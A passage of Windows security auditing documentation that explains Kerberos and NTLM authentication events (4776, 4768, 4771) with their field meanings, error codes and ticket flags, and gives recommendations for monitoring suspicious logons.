flagged.
0xC0000234 Account logon with account locked.
0xc0000371 The local account store does not contain secret material for
the specified account.
0x0 No errors.
Table 1. Winlogon Error Codes.

For 4776(S, F ): The computer attempted to validate the credentials for an account.
TYPE OF MONITORING REQUIRED RECOMMENDATION
High-value accounts: You might have high-value domain or Monitor this event with the “Logon Account” that
local accounts for which you need to monitor each action. corresponds to the high-value account or accounts.
Examples of high-value accounts are database administrators,
built-in local administrator account, domain administrators,
service accounts, domain controller accounts and so on.
Anomalies or malicious actions: You might have specific When you monitor for anomalies or malicious actions, use the
requirements for detecting anomalies or monitoring potential “Logon Account” value (with other information) to monitor
malicious actions. For example, you might need to monitor for how or when a particular account is being used.
use of an account outside of working hours. To monitor activity of specific user accounts outside of
working hours, monitor the appropriate Logon Account +
Source Workstation pairs.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “Logon Account” that should
or guest accounts, or other accounts that should never be never be used.
used.
Account whitelist: You might have a specific whitelist of If this event corresponds to a “whitelist-only” action, review
accounts that are the only ones allowed to perform actions the “Logon Account” for accounts that are outside the
corresponding to particular events. whitelist.
Restricted-use computers: You might have certain Monitor the target Source Workstation for credential
computers from which certain people (accounts) should not validation requests from the “Logon Account” that you are
log on. concerned about.
Account naming conventions: Your organization might have Monitor “Logon Account” for names that don’t comply with
specific naming conventions for account names. naming conventions.
If NTLM authentication should not be used for a specific account, monitor for that account. Don’t forget that
local logon will always use NTLM authentication if an account logs on to a device where its user account is
stored.
You can use this event to collect all NTLM authentication attempts in the domain, if needed. Don’t forget
that local logon will always use NTLM authentication if the account logs on to a device where its user
account is stored.
If a local account should be used only locally (for example, network logon or terminal services logon is not
allowed), you need to monitor for all events where Source Workstation and Computer (where the event
was generated and where the credentials are stored) have different values.
Consider tracking the following errors for the reasons listed:
ERROR TO TRACK WHAT THE ERROR MIGHT INDICATE
User logon with misspelled or bad user account For example, N events in the last N minutes can be an
indicator of an account enumeration attack, especially relevant
for highly critical accounts.
User logon with misspelled or bad password For example, N events in the last N minutes can be an
indicator of a brute-force password attack, especially relevant
User logon outside authorized hours Can indicate a compromised account; especially relevant for
highly critical accounts.
User logon from unauthorized workstation Can indicate a compromised account; especially relevant for
User logon to account disabled by administrator For example, N events in last N minutes can be an indicator of
an account compromise attempt, especially relevant for highly
critical accounts.
User logon with expired account Can indicate an account compromise attempt; especially
relevant for highly critical accounts.
User logon with account locked Can indicate a brute-force password attack; especially relevant
4777(F): The domain controller failed to validate the
credentials for an account.
Applies to
Windows 10
Windows Server 2016
Currently this event doesn’t generate. It is a defined event, but it is never invoked by the operating system. 4776
failure event is generated instead.
Applies to
Windows 10
Windows Server 2016
Audit Kerberos Authentication Service determines whether to generate audit events for Kerberos authentication
ticket-granting ticket (TGT) requests.
If you configure this policy setting, an audit event is generated after a Kerberos authentication TGT request.
Success audits record successful attempts and Failure audits record unsuccessful attempts.
Event volume: High on Kerberos Key Distribution Center servers.
This subcategory contains events about issued TGTs and failed TGT requests. It also contains events about failed
Pre-Authentications, due to wrong user password or when the user’s password has expired.
STRONGER STRONGER
STRONGER STRONGER
Domain Yes Yes Yes Yes We recommend

Controller Success auditing,
because you will
see all Kerberos
Authentication
requests (TGT
requests), which
are a part of
domain account
logons. Also, you
can see the IP
address from
which this
account
requested a TGT,
when TGT was
requested, which
encryption type
was used and so
on.
We recommend
Failure auditing,
because you will
see all failed
requests with
wrong password,
username,
revoked
certificate, and so
on. You will also
be able to detect
Kerberos issues
or possible attack
attempts.
Expected volume
is high on
domain
controllers.
Member Server No No No No This subcategory

makes sense only
on domain
controllers.
Workstation No No No No This subcategory

makes sense only
on domain
controllers.
Events List:
4768(S, F ): A Kerberos authentication ticket (TGT) was requested.
4771(F ): Kerberos pre-authentication failed.
4772(F ): A Kerberos authentication ticket request failed.
4768(S, F): A Kerberos authentication ticket (TGT)
was requested.
Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Kerberos
Authentication Service
Event Description:
This event generates every
time Key Distribution Center
issues a Kerberos Ticket
Granting Ticket (TGT).
This event generates only on
domain controllers.
If TGT issue fails then you will
see Failure event with Result
Code field not equal to “0x0”.
This event doesn't generate
for Result Codes: 0x10, 0x17
and 0x18. Event “4771:
Kerberos pre-authentication
failed.” generates instead.
Note For
recommendations, see
Security Monitoring
Recommendations for this
event.
Event XML:
- <System>
<Level>0</Level>
<Task>14339</Task>
<Opcode>0</Opcode>
<Correlation />
<Security />
</System>
- <EventData>
<Data Name="TargetDomainName">CONTOSO.LOCAL</Data>
<Data Name="TargetSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="ServiceName">krbtgt</Data>
<Data Name="ServiceSid">S-1-5-21-3457937927-2839227994-823803824-502</Data>
<Data Name="TicketOptions">0x40810010</Data>
<Data Name="Status">0x0</Data>
<Data Name="TicketEncryptionType">0x12</Data>
<Data Name="PreAuthType">15</Data>
<Data Name="IpAddress">::ffff:10.0.0.12</Data>
<Data Name="IpPort">49273</Data>
<Data Name="CertIssuerName">contoso-DC01-CA-1</Data>
<Data Name="CertSerialNumber">1D0000000D292FBE3C6CDDAFA200020000000D</Data>
<Data Name="CertThumbprint">564DFAEE99C71D62ABC553E695BD8DBC46669413</Data>
</EventData>
</Event>
Required Server Roles: Active Directory domain controller.

Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Account Information:
Account Name [Type = UnicodeString]: the name of account, for which (TGT) ticket was requested.
Computer account name ends with $ character.
User account example: dadmin
Supplied Realm Name [Type = UnicodeString]: the name of the Kerberos Realm that Account Name
belongs to. This can appear in a variety of formats, including the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
Note A Kerberos Realm is a set of managed nodes that share the same Kerberos database. The Kerberos
database resides on the Kerberos master computer system, which should be kept in a physically secure room.
Active Directory domain is the example of Kerberos Realm in the Microsoft Windows Active Directory world.
User ID [Type = SID ]: SID of account for which (TGT) ticket was requested. Event Viewer automatically
tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source
data in the event.
For example: CONTOSO\dadmin or CONTOSO\WIN81$.
NULL SID – this value shows in 4768 Failure events.
Note A security identifier (SID ) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that
user from the database and places it in the access token for that user. The system uses the SID in the access
token to identify the user in all subsequent interactions with Windows security. When a SID has been used as
the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For
more information about SIDs, see Security identifiers.
Service Information:
Service Name [Type = UnicodeString]: the name of the service in the Kerberos Realm to which TGT
request was sent. Typically has value “krbtgt” for TGT requests, which means Ticket Granting Ticket
issuing service.
For Failure events Service Name typically has the following format: krbtgt/REALM_NAME. For
example: krbtgt/CONTOSO.
Service ID [Type = SID ]: SID of the service account in the Kerberos Realm to which TGT request was sent.
Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be
resolved, you will see the source data in the event.
Domain controllers have a specific service account ( krbtgt) that is used by the Key Distribution Center
(KDC ) service to issue Kerberos tickets. It has a built-in, pre-defined SID: S -1-5-
21-DOMAIN_IDENTIFIER -502.
NULL SID – this value shows in 4768 Failure events.
Network Information:
Client Address [Type = UnicodeString]: IP address of the computer from which the TGT request was
received. Formats vary, and include the following:
IPv6 or IPv4 address.
::ffff:IPv4_address.
::1 - localhost.
Client Port [Type = UnicodeString]: source port number of client network connection (TGT request
connection).
0 for local (localhost) requests.
Additional information:
Ticket Options [Type = HexInt32]: this is a set of different ticket flags in hexadecimal format.
Example:
Ticket Options: 0x40810010
Binary view: 01000000100000010000000000010000
Using MSB 0 bit numbering we have bit 1, 8, 15 and 27 set = Forwardable, Renewable,
Canonicalize, Renewable-ok.
Note In the table below “MSB 0” bit numbering is used, because RFC documents use this style. In “MSB 0”
style bit numbering begins from left.
The most common values:

0x40810010 - Forwardable, Renewable, Canonicalize, Renewable-ok
0x40810000 - Forwardable, Renewable, Canonicalize
0x60810010 - Forwardable, Forwarded, Renewable, Canonicalize, Renewable-ok
BIT FLAG NAME DESCRIPTION
0 Reserved -
1 Forwardable (TGT only). Tells the ticket-granting

service that it can issue a new TGT—
based on the presented TGT—with a
different network address based on the
presented TGT.
2 Forwarded Indicates either that a TGT has been

forwarded or that a ticket was issued
from a forwarded TGT.
3 Proxiable (TGT only). Tells the ticket-granting

service that it can issue tickets with a
network address that differs from the
one in the TGT.
4 Proxy Indicates that the network address in

the ticket is different from the one in
the TGT used to obtain the ticket.
5 Allow-postdate Postdated tickets SHOULD NOT be

supported in KILE (Microsoft Kerberos
Protocol Extension).
6 Postdated Postdated tickets SHOULD NOT be

7 Invalid This flag indicates that a ticket is invalid,

and it must be validated by the KDC
before use. Application servers must
reject tickets which have this flag set.
8 Renewable Used in combination with the End Time

and Renew Till fields to cause tickets
with long life spans to be renewed at
the KDC periodically.
9 Initial Indicates that a ticket was issued using

the authentication service (AS)
exchange and not issued based on a
TGT.
10 Pre-authent Indicates that the client was

authenticated by the KDC before a
ticket was issued. This flag usually
indicates the presence of an
authenticator in the ticket. It can also
flag the presence of credentials taken
from a smart card logon.
11 Opt-hardware-auth This flag was originally intended to

indicate that hardware-supported
authentication was used during pre-
authentication. This flag is no longer
recommended in the Kerberos V5
protocol. KDCs MUST NOT issue a
ticket with this flag set. KDCs SHOULD
NOT preserve this flag if it is set by
another KDC.
12 Transited-policy-checked KILE MUST NOT check for transited

domains on servers or a KDC.
Application servers MUST ignore the
TRANSITED-POLICY-CHECKED flag.
13 Ok-as-delegate The KDC MUST set the OK-AS-

DELEGATE flag if the service account is
trusted for delegation.
14 Request-anonymous KILE not use this flag.
15 Name-canonicalize In order to request referrals the

Kerberos client MUST explicitly request
the "canonicalize" KDC option for the
AS-REQ or TGS-REQ.
16-25 Unused -
26 Disable-transited-check By default the KDC will check the

transited field of a TGT against the
policy of the local realm before it will
issue derivative tickets based on the
TGT. If this flag is set in the request,
checking of the transited field is
disabled. Tickets issued without the
performance of this check will be noted
by the reset (0) value of the
TRANSITED-POLICY-CHECKED flag,
indicating to the application server that
the transited field must be checked
locally. KDCs are encouraged but not
required to honor
the DISABLE-TRANSITED-CHECK
option.
Should not be in use, because
Transited-policy-checked flag is not
supported by KILE.
27 Renewable-ok The RENEWABLE-OK option indicates

that a renewable ticket will be
acceptable if a ticket with the requested
life cannot otherwise be provided, in
which case a renewable ticket may be
issued with a renew-till equal to the
requested end time. The value of the
renew-till field may still be limited by
local limits, or limits selected by the
individual principal or server.
28 Enc-tkt-in-skey No information.
29 Unused -
30 Renew The RENEW option indicates that the

present request is for a renewal. The
ticket provided is encrypted in the
secret key for the server on which it is
valid. This option will only be honored if
the ticket to be renewed has its
RENEWABLE flag set and if the time in
it’s renew-till field has not passed. The
ticket to be renewed is passed in the
padata field as part of the
authentication header.
31 Validate This option is used only by the ticket-

granting service. The VALIDATE option
indicates that the request is to validate
a postdated ticket. Should not be in
use, because postdated tickets are not
supported by KILE.
Table 2. Kerberos ticket flags.

Note KILE (Microsoft Kerberos Protocol Extension) – Kerberos protocol extensions used in Microsoft
operating systems. These extensions provide additional capability for authorization information including
group memberships, interactive logon information, and integrity levels.
Result Code [Type = HexInt32]: hexadecimal result code of TGT issue operation. The “Table 3. TGT/TGS issue
error codes.” contains the list of the most common error codes for this event.
CODE CODE NAME DESCRIPTION POSSIBLE CAUSES
0x0 KDC_ERR_NONE No error No errors were found.
0x1 KDC_ERR_NAME_EXP Client's entry in KDC No information.

database has expired
0x2 KDC_ERR_SERVICE_EXP Server's entry in KDC No information.

0x3 KDC_ERR_BAD_PVNO Requested Kerberos version No information.

number not supported
0x4 KDC_ERR_C_OLD_MAST_KV Client's key encrypted in old No information.

NO master key
0x5 KDC_ERR_S_OLD_MAST_KV Server's key encrypted in No information.

NO old master key
0x6 KDC_ERR_C_PRINCIPAL_UN Client not found in Kerberos The username doesn’t exist.
KNOWN database
0x7 KDC_ERR_S_PRINCIPAL_UN Server not found in This error can occur if the
KNOWN Kerberos database domain controller cannot
find the server’s name in
Active Directory. This error is
similar to
KDC_ERR_C_PRINCIPAL_UN
KNOWN except that it
occurs when the server
name cannot be found.
0x8 KDC_ERR_PRINCIPAL_NOT_ Multiple principal entries in This error occurs if duplicate

UNIQUE KDC database principal names exist.
Unique principal names are
crucial for ensuring mutual
authentication. Thus,
duplicate principal names
are strictly forbidden, even
across multiple realms.
Without unique principal
names, the client has no
way of ensuring that the
server it is communicating
with is the correct one.
0x9 KDC_ERR_NULL_KEY The client or server has a No master key was found
null key (master key) for client or server. Usually it
means that administrator
should reset the password
on the account.
0xA KDC_ERR_CANNOT_POSTD Ticket (TGT) not eligible for This error can occur if a
ATE postdating client requests postdating of
a Kerberos ticket. Postdating
is the act of requesting that
a ticket’s start time be set
into the future.
It also can occur if there is a
time difference between the
client and the KDC.
0xB KDC_ERR_NEVER_VALID Requested start time is later There is a time difference

than end time between the KDC and the
client.
0xC KDC_ERR_POLICY Requested start time is later This error is usually the
than end time result of logon restrictions in
place on a user’s account.
For example workstation
restriction, smart card
authentication requirement
or logon time restriction.
0xD KDC_ERR_BADOPTION KDC cannot accommodate Impending expiration of a

requested option TGT.
The SPN to which the client
is attempting to delegate
credentials is not in its
Allowed-to-delegate-to list
0xE KDC_ERR_ETYPE_NOTSUPP KDC has no support for In general, this error occurs
encryption type when the KDC or a client
receives a packet that it
cannot decrypt.
0xF KDC_ERR_SUMTYPE_NOSUP KDC has no support for The KDC, server, or client
P checksum type receives a packet for which it
does not have a key of the
appropriate encryption type.
The result is that the
computer is unable to
decrypt the ticket.
0x10 KDC_ERR_PADATA_TYPE_N KDC has no support for Smart card logon is being
OSUPP PADATA type (pre- attempted and the proper
authentication data) certificate cannot be located.
This can happen because
the wrong certification
authority (CA) is being
queried or the proper CA
cannot be contacted.
It can also happen when a
domain controller doesn’t
have a certificate installed
for smart cards (Domain
Controller or Domain
Controller Authentication
templates).
This error code cannot occur
in event “4768. A Kerberos
authentication ticket (TGT)
was requested”. It occurs in
“4771. Kerberos pre-
authentication failed” event.
0x11 KDC_ERR_TRTYPE_NO_SUPP KDC has no support for No information.

transited type
0x12 KDC_ERR_CLIENT_REVOKED Client’s credentials have This might be because of an

been revoked explicit disabling or because
of other restrictions in place
on the account. For
example: account disabled,
expired, or locked out.
0x13 KDC_ERR_SERVICE_REVOKE Credentials for server have No information.

D been revoked
0x14 KDC_ERR_TGT_REVOKED TGT has been revoked Since the remote KDC may
change its PKCROSS key
while there are PKCROSS
tickets still active, it
SHOULD cache the old
PKCROSS keys until the last
issued PKCROSS ticket
expires. Otherwise, the
remote KDC will respond to
a client with a KRB-ERROR
message of type
KDC_ERR_TGT_REVOKED.
See RFC1510 for more
details.
0x15 KDC_ERR_CLIENT_NOTYET Client not yet valid—try No information.

again later
0x16 KDC_ERR_SERVICE_NOTYET Server not yet valid—try No information.

again later
0x17 KDC_ERR_KEY_EXPIRED Password has expired— The user’s password has

change password to reset expired.
0x18 KDC_ERR_PREAUTH_FAILED Pre-authentication The wrong password was

information was invalid provided.
0x19 KDC_ERR_PREAUTH_REQUIR Additional pre- This error often occurs in

ED authentication required UNIX interoperability
scenarios. MIT-Kerberos
clients do not request pre-
authentication when they
send a KRB_AS_REQ
message. If pre-
authentication is required
(the default), Windows
systems will send this error.
Most MIT-Kerberos clients
will respond to this error by
giving the pre-
authentication, in which case
the error can be ignored,
but some clients might not
respond in this way.
0x1A KDC_ERR_SERVER_NOMATC KDC does not know about No information.

H the requested server
0x1B KDC_ERR_SVC_UNAVAILABL KDC is unavailable No information.

E
0x1F KRB_AP_ERR_BAD_INTEGRIT Integrity check on The authenticator was

Y decrypted field failed encrypted with something
other than the session key.
The result is that the client
cannot decrypt the resulting
message. The modification
of the message could be the
result of an attack or it
could be because of network
noise.
0x20 KRB_AP_ERR_TKT_EXPIRED The ticket has expired The smaller the value for the
“Maximum lifetime for user
ticket” Kerberos policy
setting, the more likely it is
that this error will occur.
Because ticket renewal is
automatic, you should not
have to do anything if you
get this message.
0x21 KRB_AP_ERR_TKT_NYV The ticket is not yet valid The ticket presented to the
server is not yet valid (in
relationship to the server
time). The most probable
cause is that the clocks on
the KDC and the client are
not synchronized.
If cross-realm Kerberos
authentication is being
attempted, then you should
verify time synchronization
between the KDC in the
target realm and the KDC in
the client realm, as well.
0x22 KRB_AP_ERR_REPEAT The request is a replay This error indicates that a

specific authenticator
showed up twice — the KDC
has detected that this
session ticket duplicates one
that it has already received.
0x23 KRB_AP_ERR_NOT_US The ticket is not for us The server has received a
ticket that was meant for a
different realm.
0x24 KRB_AP_ERR_BADMATCH The ticket and authenticator The KRB_TGS_REQ is being

do not match sent to the wrong KDC.
There is an account
mismatch during protocol
transition.
0x25 KRB_AP_ERR_SKEW The clock skew is too great This error is logged if a client
computer sends a
timestamp whose value
differs from that of the
server’s timestamp by more
than the number of minutes
found in the “Maximum
tolerance for computer clock
synchronization” setting in
Kerberos policy.
0x26 KRB_AP_ERR_BADADDR Network address in network Session tickets MAY include

layer header doesn't match the addresses from which
address inside ticket they are valid. This error can
occur if the address of the
computer sending the ticket
is different from the valid
address in the ticket. A
possible cause of this could
be an Internet Protocol (IP)
address change. Another
possible cause is when a
ticket is passed through a
proxy server or NAT. The
client is unaware of the
address scheme used by the
proxy server, so unless the
program caused the client
to request a proxy server
ticket with the proxy server's
source address, the ticket
could be invalid.
0x27 KRB_AP_ERR_BADVERSION Protocol version numbers When an application

don't match (PVNO) receives a KRB_SAFE
message, it verifies it. If any
error occurs, an error code is
reported for use by the
application.
The message is first checked
by verifying that the
protocol version and type
fields match the current
version and KRB_SAFE,
respectively. A mismatch
generates a
KRB_AP_ERR_BADVERSION.
details.
0x28 KRB_AP_ERR_MSG_TYPE Message type is This message is generated

unsupported when target server finds
that message format is
wrong. This applies to
KRB_AP_REQ, KRB_SAFE,
KRB_PRIV and KRB_CRED
messages.
This error also generated if
use of UDP protocol is being
attempted with User-to-
User authentication.
0x29 KRB_AP_ERR_MODIFIED Message stream modified The authentication data was

and checksum didn't match encrypted with the wrong
key for the intended server.
The authentication data was
modified in transit by a
hardware or software error,
or by an attacker.
The client sent the
authentication data to the
wrong server because
incorrect DNS data caused
the client to send the
request to the wrong server.
The client sent the
wrong server because DNS
data was out-of-date on the
client.
0x2A KRB_AP_ERR_BADORDER Message out of order This event generates for

(possible tampering) KRB_SAFE and KRB_PRIV
messages if an incorrect
sequence number is
included, or if a sequence
number is expected but not
present. See RFC4120 for
more details.
0x2C KRB_AP_ERR_BADKEYVER Specified version of key is This error might be

not available generated on server side
during receipt of invalid
KRB_AP_REQ message. If the
key version indicated by the
Ticket in the KRB_AP_REQ is
not one the server can use
(e.g., it indicates an old key,
and the server no longer
possesses a copy of the old
key), the
KRB_AP_ERR_BADKEYVER
error is returned.
0x2D KRB_AP_ERR_NOKEY Service key not available This error might be

generated on server side
KRB_AP_REQ message.
Because it is possible for the
server to be registered in
multiple realms, with
different keys in each, the
realm field in the
unencrypted portion of the
ticket in the KRB_AP_REQ is
used to specify which secret
key the server should use to
decrypt that ticket. The
KRB_AP_ERR_NOKEY error
code is returned if the
server doesn't have the
proper key to decipher the
ticket.
0x2E KRB_AP_ERR_MUT_FAIL Mutual authentication failed No information.
0x2F KRB_AP_ERR_BADDIRECTIO Incorrect message direction No information.

N
0x30 KRB_AP_ERR_METHOD Alternative authentication According RFC4120 this

method required error message is obsolete.
0x31 KRB_AP_ERR_BADSEQ Incorrect sequence number No information.

in message
0x32 KRB_AP_ERR_INAPP_CKSUM Inappropriate type of When KDC receives

checksum in message KRB_TGS_REQ message it
(checksum may be decrypts it, and after that,
unsupported) the user-supplied checksum
in the Authenticator MUST
be verified against the
contents of the request. The
message MUST be rejected
either if the checksums do
not match (with an error
code of
KRB_AP_ERR_MODIFIED) or
if the checksum is not
collision-proof (with an error
code of
KRB_AP_ERR_INAPP_CKSUM
).
0x33 KRB_AP_PATH_NOT_ACCEPT Desired path is unreachable No information.

ED
0x34 KRB_ERR_RESPONSE_TOO_B Too much data The size of a ticket is too

IG large to be transmitted
reliably via UDP. In a
Windows environment, this
message is purely
informational. A computer
running a Windows
operating system will
automatically try TCP if UDP
fails.
0x3C KRB_ERR_GENERIC Generic error Group membership has

overloaded the PAC.
Multiple recent password
changes have not
propagated.
Crypto subsystem error
caused by running out of
memory.
SPN too long.
SPN has too many parts.
0x3D KRB_ERR_FIELD_TOOLONG Field is too long for this Each request

implementation (KRB_KDC_REQ) and
response (KRB_KDC_REP or
KRB_ERROR) sent over the
TCP stream is preceded by
the length of the request as
4 octets in network byte
order. The high bit of the
length is reserved for future
expansion and MUST
currently be set to zero. If a
KDC that does not
understand how to interpret
a set high bit of the length
encoding receives a request
with the high order bit of
the length set, it MUST
return a KRB-ERROR
message with the error
KRB_ERR_FIELD_TOOLONG
and MUST close the TCP
stream.
0x3E KDC_ERR_CLIENT_NOT_TRU The client trust failed or is This typically happens when
STED not implemented user’s smart-card certificate
is revoked or the root
Certification Authority that
issued the smart card
certificate (in a chain) is not
trusted by the domain
controller.
0x3F KDC_ERR_KDC_NOT_TRUSTE The KDC server trust failed The trustedCertifiers field
D or could not be verified contains a list of certification
authorities trusted by the
client, in the case that the
client does not possess the
KDC's public key certificate.
If the KDC has no certificate
signed by any of the
trustedCertifiers, then it
returns an error of type
KDC_ERR_KDC_NOT_TRUSTE
D. See RFC1510 for more
details.
0x40 KDC_ERR_INVALID_SIG The signature is invalid This error is related to

PKINIT. If a PKI trust
relationship exists, the KDC
then verifies the client's
signature on AuthPack (TGT
request signature). If that
fails, the KDC returns an
error message of type
KDC_ERR_INVALID_SIG.
0x41 KDC_ERR_KEY_TOO_WEAK A higher encryption level is If the clientPublicValue field

needed is filled in, indicating that the
client wishes to use Diffie-
Hellman key agreement,
then the KDC checks to see
that the parameters satisfy
its policy. If they do not (e.g.,
the prime size is insufficient
for the expected encryption
type), then the KDC sends
back an error message of
type
KDC_ERR_KEY_TOO_WEAK.
0x42 KRB_AP_ERR_USER_TO_USE User-to-user authorization In the case that the client

R_REQUIRED is required application doesn't know
that a service requires user-
to-user authentication, and
requests and receives a
conventional KRB_AP_REP,
the client will send the
KRB_AP_REP request, and
the server will respond with
a KRB_ERROR token as
described in RFC1964, with
a msg-type of
KRB_AP_ERR_USER_TO_USE
R_REQUIRED.
0x43 KRB_AP_ERR_NO_TGT No TGT was presented or In user-to-user

available authentication if the service
does not possess a ticket
granting ticket, it should
return the error
KRB_AP_ERR_NO_TGT.
0x44 KDC_ERR_WRONG_REALM Incorrect domain or Although this error rarely

principal occurs, it occurs when a
client presents a cross-realm
TGT to a realm other than
the one specified in the TGT.
Typically, this results from
incorrectly configured DNS.
Table 3. TGT/TGS issue error codes.
Ticket Encryption Type [Type = HexInt32]: the cryptographic suite that was used for issued TGT.
Table 4. Kerberos encryption types

TYPE TYPE NAME DESCRIPTION
0x1 DES-CBC-CRC Disabled by default starting from

R2.
0x3 DES-CBC-MD5 Disabled by default starting from

R2.
0x11 AES128-CTS-HMAC-SHA1-96 Supported starting from Windows

Server 2008 and Windows Vista.

0x17 RC4-HMAC Default suite for operating systems

before Windows Server 2008 and
Windows Vista.
0x18 RC4-HMAC-EXP Default suite for operating systems

Windows Vista.
0xFFFFFFFF or 0xffffffff - This type shows in Audit Failure events.
Pre-Authentication Type [Type = UnicodeString]: the code number of pre-Authentication type which was
used in TGT request.
Table 5. Kerberos Pre-Authentication types.

0 - Logon without Pre-Authentication.
2 PA-ENC-TIMESTAMP This is a normal type for standard

password authentication.
11 PA-ETYPE-INFO The ETYPE-INFO pre-authentication

type is sent by the KDC in a KRB-
ERROR indicating a requirement for
additional pre-authentication. It is
usually used to notify a client of which
key to use for the encryption of an
encrypted timestamp for the purposes
of sending a PA-ENC-TIMESTAMP pre-
authentication value.
Never saw this Pre-Authentication Type
in Microsoft Active Directory
environment.
15 PA-PK-AS-REP_OLD Used for Smart Card logon

authentication.
17 PA-PK-AS-REP This type should also be used for Smart

Card authentication, but in certain
Active Directory environments, it is
never seen.
19 PA-ETYPE-INFO2 The ETYPE-INFO2 pre-authentication

Never saw this Pre-Authentication Type
in Microsoft Active Directory
environment.
20 PA-SVR-REFERRAL-INFO Used in KDC Referrals tickets.
138 PA-ENCRYPTED-CHALLENGE Logon using Kerberos Armoring (FAST).

Supported starting from Windows
Server 2012 domain controllers and
Windows 8 clients.
- This type shows in Audit Failure events.
Certificate Information:
Certificate Issuer Name [Type = UnicodeString]: the name of the Certification Authority that issued the
smart card certificate. Populated in Issued by field in certificate.
Certificate Serial Number [Type = UnicodeString]: smart card certificate’s serial number. Can be found
in Serial number field in the certificate.
Certificate Thumbprint [Type = UnicodeString]: smart card certificate’s thumbprint. Can be found in
Thumbprint field in the certificate.

For 4768(S, F ): A Kerberos authentication ticket (TGT) was requested.
High-value accounts: You might have high-value domain or Monitor this event with the “User ID” that corresponds to
local accounts for which you need to monitor each action. the high-value account or accounts.
requirements for detecting anomalies or monitoring potential “User ID” (with other information) to monitor how or when a
malicious actions. For example, you might need to monitor particular account is being used.
for use of an account outside of working hours.
Non-active accounts: You might have non-active, disabled, Monitor this event with the “User ID” that corresponds to
or guest accounts, or other accounts that should never be the accounts that should never be used.
used.
accounts that are the only ones allowed to perform actions the “User ID” for accounts that are outside the whitelist.
corresponding to particular events.
External accounts: You might be monitoring accounts from Monitor this event for the “Supplied Realm Name”
another domain, or “external” accounts that are not allowed corresponding to another domain or “external” location.
to perform certain actions (represented by certain specific
events).
Account naming conventions: Your organization might Monitor “User ID” for names that don’t comply with naming
have specific naming conventions for account names. conventions.
You can track all 4768 events where the Client Address is not from your internal IP range or not from
private IP ranges.
If you know that Account Name should be used only from known list of IP addresses, track all Client
Address values for this Account Name in 4768 events. If Client Address is not from the whitelist,
generate the alert.
All Client Address = ::1 means local authentication. If you know the list of accounts which should log on
to the domain controllers, then you need to monitor for all possible violations, where Client Address = ::1
and Account Name is not allowed to log on to any domain controller.
All 4768 events with Client Port field value > 0 and < 1024 should be examined, because a well-known
port was used for outbound connection.
Also consider monitoring the fields shown in the following table, to discover the issues listed:
FIELD ISSUE TO DISCOVER
Certificate Issuer Name Certification authority name is not from your PKI
infrastructure.
Certificate Issuer Name Certification authority name is not authorized to issue smart
card authentication certificates.
Pre-Authentication Type Value is 0, which means that pre-authentication was not

used. All accounts should use Pre-Authentication, except
accounts configured with “Do not require Kerberos
preauthentication,” which is a security risk. For more
information, see Table 5. Kerberos Pre-Authentication types.
Pre-Authentication Type Value is not 15 when account must use a smart card for
authentication. For more information, see Table 5. Kerberos
Pre-Authentication types.
Pre-Authentication Type Value is not 2 when only standard password authentication is

in use in the organization. For more information, see Table 5.
Kerberos Pre-Authentication types.
Pre-Authentication Type Value is not 138 when Kerberos Armoring is enabled for all
Kerberos communications in the organization. For more
Ticket Encryption Type Value is 0x1 or 0x3, which means the DES algorithm was
used. DES should not be in use, because of low security and
known vulnerabilities. It is disabled by default starting from
Windows 7 and Windows Server 2008 R2. For more
information, see Table 4. Kerberos encryption types.
Ticket Encryption Type Starting with Windows Vista and Windows Server 2008,
monitor for values other than 0x11 and 0x12. These are the
expected values, starting with these operating systems, and
represent AES-family algorithms. For more information, see
Table 4. Kerberos encryption types.
Result Code 0x6 (The username doesn't exist), if you see, for example N
events in last N minutes. This can be an indicator of account
enumeration attack, especially for highly critical accounts.
Result Code 0x7 (Server not found in Kerberos database). This error can
occur if the domain controller cannot find the server's name
in Active Directory.
Result Code 0x8 (Multiple principal entries in KDC database). This will help
you to find duplicate SPNs faster.
Result Code 0x9 (The client or server has a null key (master key)). This
error can help you to identify problems with Kerberos
authentication faster.
Result Code 0xA (Ticket (TGT) not eligible for postdating). Microsoft
systems should not request postdated tickets. These events
could help identify anomaly activity.
Result Code 0xC (Requested start time is later than end time), if you see,
for example N events in last N minutes. This can be an
indicator of an account compromise attempt, especially for
Result Code 0xE (KDC has no support for encryption type). In general,
this error occurs when the KDC or a client receives a packet
that it cannot decrypt. Monitor for these events because this
should not happen in a standard Active Directory
environment.
Result Code 0xF (KDC has no support for checksum type). Monitor for
these events because this should not happen in a standard
Active Directory environment.
Result Code 0x12 (Client's credentials have been revoked), if you see, for
example N events in last N minutes. This can be an indicator
of anomaly activity or brute-force attack, especially for highly
critical accounts.
Result Code 0x1F (Integrity check on decrypted field failed). The

authenticator was encrypted with something other than the
session key. The result is that the KDC cannot decrypt the
TGT. The modification of the message could be the result of
an attack or it could be because of network noise.
Result Code 0x22 (The request is a replay). This error indicates that a
specific authenticator showed up twice—the KDC has
detected that this session ticket duplicates one that it has
already received. It could be a sign of attack attempt.
Result Code 0x29 (Message stream modified and checksum didn't match).
The authentication data was encrypted with the wrong key
for the intended server. The authentication data was modified
in transit by a hardware or software error, or by an attacker.
Monitor for these events because this should not happen in a
standard Active Directory environment.
Result Code 0x3C (Generic error). This error can help you more quickly
identify problems with Kerberos authentication.
Result Code 0x3E (The client trust failed or is not implemented). This error
helps you identify logon attempts with revoked certificates
and the situations when the root Certification Authority that
issued the smart card certificate (through a chain) is not
trusted by a domain controller.
Result Code 0x3F, 0x40, 0x41 errors. These errors can help you more
quickly identify smart-card related problems with Kerberos
authentication.
4771(F): Kerberos pre-authentication failed.
Applies to
Windows 10
Windows Server 2016
Authentication Service
Event Description:
This event generates every time the
Key Distribution Center fails to issue a
Kerberos Ticket Granting Ticket (TGT).
This can occur when a domain
controller doesn’t have a certificate
installed for smart card authentication
(for example, with a “Domain
Controller” or “Domain Controller
Authentication” template), the user’s
password has expired, or the wrong
password was provided.
This event generates only on domain
controllers.
This event is not generated if “Do not
require Kerberos preauthentication”
option is set for the account.
Note For recommendations, see

Security Monitoring
